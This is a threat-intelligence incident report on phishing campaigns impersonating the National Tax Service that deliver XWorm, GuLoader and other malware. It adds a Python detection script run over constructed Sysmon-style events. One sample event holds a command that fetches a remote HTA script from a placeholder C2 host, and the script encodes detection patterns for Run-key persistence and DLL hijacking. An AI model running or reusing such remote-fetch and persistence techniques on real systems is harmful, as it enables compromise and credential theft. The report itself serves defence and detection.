Full Report
There is a noticeable increase in phishing emails impersonating the National Tax Service (NTS) whenever it is time to file value-added tax (VAT) and other taxes. AhnLab SEcurity intelligence Center (ASEC) has been alerting users to this threat by distributing relevant content. Phishing cases impersonating the National Tax Service have been ongoing for several […] The post Trend Report on Phishing Malware Impersonating the National Tax Service (NTS) appeared first on ASEC.
Analysis Summary
# Incident Report: Escalated NTS Phishing Campaign Delivering XWorm and Various Malware
## Executive Summary
A significant increase in sophisticated phishing campaigns impersonating the National Tax Service (NTS) has been observed, particularly around tax filing periods. Threat actors are leveraging diverse file formats (HTML, VBS, PPT, DLL, SCR, EXE, LNK, CHM) to deliver malware, including downloaders like GuLoader and infostealers such as XWorm. The impact revolves around credential theft, system compromise, and potential data exfiltration, necessitating heightened user caution, especially during high-stakes regulatory periods.
## Incident Details
- **Discovery Date:** Ongoing monitoring leading up to December 03, 2024 (Report Date)
- **Incident Date:** Trend identified as significantly increased in 2024.
- **Affected Organization:** General users/businesses interacting with the National Tax Service (NTS).
- **Sector:** Government Services/Taxation (Target of Impersonation).
- **Geography:** Not explicitly stated, but implied to be the regions served by the NTS.
## Timeline of Events
### Initial Access
- **Date/Time:** Varies, coinciding with VAT and other tax filing periods.
- **Vector:** Email Phishing.
- **Details:** Emails impersonate the NTS, using manipulated sender addresses. Delivery mechanisms include email attachments or hyperlinks leading to malware hosting sites.
### Lateral Movement
- **Details:** Specific lateral movement techniques are not detailed for all vectors, but malware like XWorm (found in one specific DLL vector) is capable of system monitoring and information theft, implying post-compromise activity. Persistence is achieved via registry modification (Run key registration).
### Data Exfiltration/Impact
- **Details:** Malware observed focuses on credential leakage (HTML/Script files), system information theft, keylogging, and webcam monitoring (XWorm via DLL hijacking vector). Downloaders like GuLoader/Lokibot are used to fetch further payloads.
### Detection & Response
- **Details:** Detection is driven by AhnLab SEcurity intelligence Center (ASEC), which distributes alerts and threat intelligence content regarding the increased trend. Response actions mentioned are primarily educational/advisory: dissemination of guidance on cautious handling of NTS-related communications.
## Attack Methodology
- **Initial Access:** Phishing emails using manipulated sender addresses, delivered via attachments (e.g., ZIP containing DLL/EXE) or links (leading to C2/malware host).
- **Persistence:** Identified in CHM vector via registering entries in the Run registry key.
- **Privilege Escalation:** Not explicitly detailed, though execution of downloaded payloads suggests elevation may occur post-initial execution.
- **Defense Evasion:** Use of legitimate-looking files disguised with NTS-related keywords and icons (e.g., `Haihaisoft PDF Reader.exe` alongside malicious DLL), and leveraging native Windows processes like `MSHTA.exe` (CHM vector) to execute scripts.
- **Credential Access:** Direct credential leakage to C2 (HTML/Script vector) and keylogging capabilities (XWorm).
- **Discovery:** Implied; XWorm is capable of stealing system information.
- **Lateral Movement:** Not explicitly detailed beyond internal system activities (e.g., persistence setup).
- **Collection:** System information, user accounts, keystrokes, webcam data (XWorm).
- **Exfiltration:** Leakage of user account credentials to C2 server.
- **Impact:** System compromise leading to surveillance and potential data theft.
## Impact Assessment
- **Financial:** Not quantified, but implied costs associated with remediation and potential regulatory fines if PII/financial data is breached.
- **Data Breach:** User account credentials, system information, keystrokes, and potentially webcam feeds are at risk due to payloads like XWorm.
- **Operational:** Potential disruption depending on the prevalence and type of malware deployed (e.g., ransomware deployment if used as the final payload after initial downloaders).
- **Reputational:** Potential damage to the public trust in the security of NTS communications, especially during critical filing times.
## Indicators of Compromise
*(Note: Indicators provided in the article are technical samples and hashes, not defanged network/file IoCs suitable for this section without further analysis. The following reflects the types of malicious artifacts observed.)*
- **Network indicators:** C2 servers accessed via malicious scripts executed by MSHTA (specific URLs are not reproduced in this summary).
- **File indicators:** Malicious binaries disguised under various extensions: .html (script), .vbs, .pptx, .dll, .scr, .exe, .lnk, .chm. Specific example: DLL file `msimg32.dll` used in hijacking.
- **Behavioral indicators:** Use of PowerShell commands (e.g., GuLoader execution), DLL hijacking, creation/execution of BAT/VBS scripts, use of MSHTA to execute remote scripts, Run registry key modification.
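As an added example (not code from the ASEC report or from AhnLab), the Python below turns the behavioral indicators above into detection checks run over constructed Sysmon-style event records; the event field names, the placeholder host/user/URL values and the path heuristics are assumptions.

```python
import re

# Added example, not code from the ASEC report. Field names mimic Sysmon events
# (process_create = ID 1, reg_set = ID 13, image_load = ID 7) and are an assumption.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
RUN_KEY = r"\software\microsoft\windows\currentversion\run"

def check_mshta(ev):
    # CHM vector: mshta.exe pulling a script over HTTP(S) rather than a local file.
    if (ev["type"] == "process_create" and ev["image"].lower().endswith(r"\mshta.exe")
            and re.search(r"https?://", ev["cmdline"], re.I)):
        return f"mshta remote script: {ev['cmdline']}"
    return None

def check_run_key(ev):
    # Persistence: Run/RunOnce value whose target sits in a user-writable folder.
    if (ev["type"] == "reg_set" and RUN_KEY in ev["key"].lower()
            and any(d in ev["data"].lower() for d in USER_WRITABLE)):
        return f"Run-key persistence: {ev['key']} -> {ev['data']}"
    return None

def check_dll_hijack(ev):
    # Search-order hijack: msimg32.dll resolved beside the EXE instead of System32.
    path = ev["image"].lower() if ev["type"] == "image_load" else ""
    if path.endswith(r"\msimg32.dll") and not path.startswith(SYSTEM_DIRS):
        return f"DLL hijack candidate: {ev['process']} loaded {ev['image']}"
    return None

def detect(events):
    checks = (check_mshta, check_run_key, check_dll_hijack)
    return [hit for ev in events for c in checks if (hit := c(ev))]

# Constructed sample telemetry; host, user and URL are placeholders, not real IoCs.
SAMPLE = [
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://c2.example.invalid/tax.hta"},
    {"type": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Program Files\Vendor\help.hta"},
    {"type": "reg_set", "key": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "data": r"C:\Users\user\AppData\Roaming\svc.vbs"},
    {"type": "image_load", "process": r"C:\Users\user\Downloads\Haihaisoft PDF Reader.exe",
     "image": r"C:\Users\user\Downloads\msimg32.dll"},
    {"type": "image_load", "process": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msimg32.dll"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE):
        print(finding)
```

Only the remote mshta invocation, the AppData-resident Run value and the msimg32.dll loaded from Downloads are flagged; the local HTA and the System32 copy of the DLL pass as benign.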
## Response Actions
- **Containment:** Not detailed for a specific victim, but the primary containment strategy implied is user awareness and blocking delivery vectors.
- **Eradication:** Wiping infected systems and removing persistence mechanisms (Run keys).
- **Recovery:** Restoring systems from clean backups and resetting compromised credentials.
## Lessons Learned
- Threat actors are highly adaptive, leveraging a wide range of file formats (8 identified) to bypass static defenses, exploiting social engineering themes relevant to the immediate time period (tax season).
- Sophisticated techniques like DLL hijacking (using recognizable legitimate application names/icons) are employed to achieve code execution and deploy advanced malware like XWorm.
- The reliance on social engineering topics that generate urgency (tax payments) remains a highly effective infection vector.
## Recommendations
- **Multi-Factor Authentication (MFA):** Mandate MFA for all critical services, especially those related to tax filings or financial accounts, to mitigate the risk of stolen credentials.
- **Application Control/Whitelisting:** Implement strict policies to limit the execution of scripts via native interpreters like MSHTA and PowerShell unless explicitly required for business processes.
- **File Type Restrictions:** Block high-risk attachment types (e.g., LNK, SCR, HTML) at the email gateway, or sandbox execution of these files.
- **User Training:** Conduct targeted, timely training emphasizing the signs of NTS impersonation, especially coinciding with tax deadlines.
- **Patching and Hardening:** Ensure systems are hardened against known malware attack paths; analyze DLL hijacking risks on endpoints.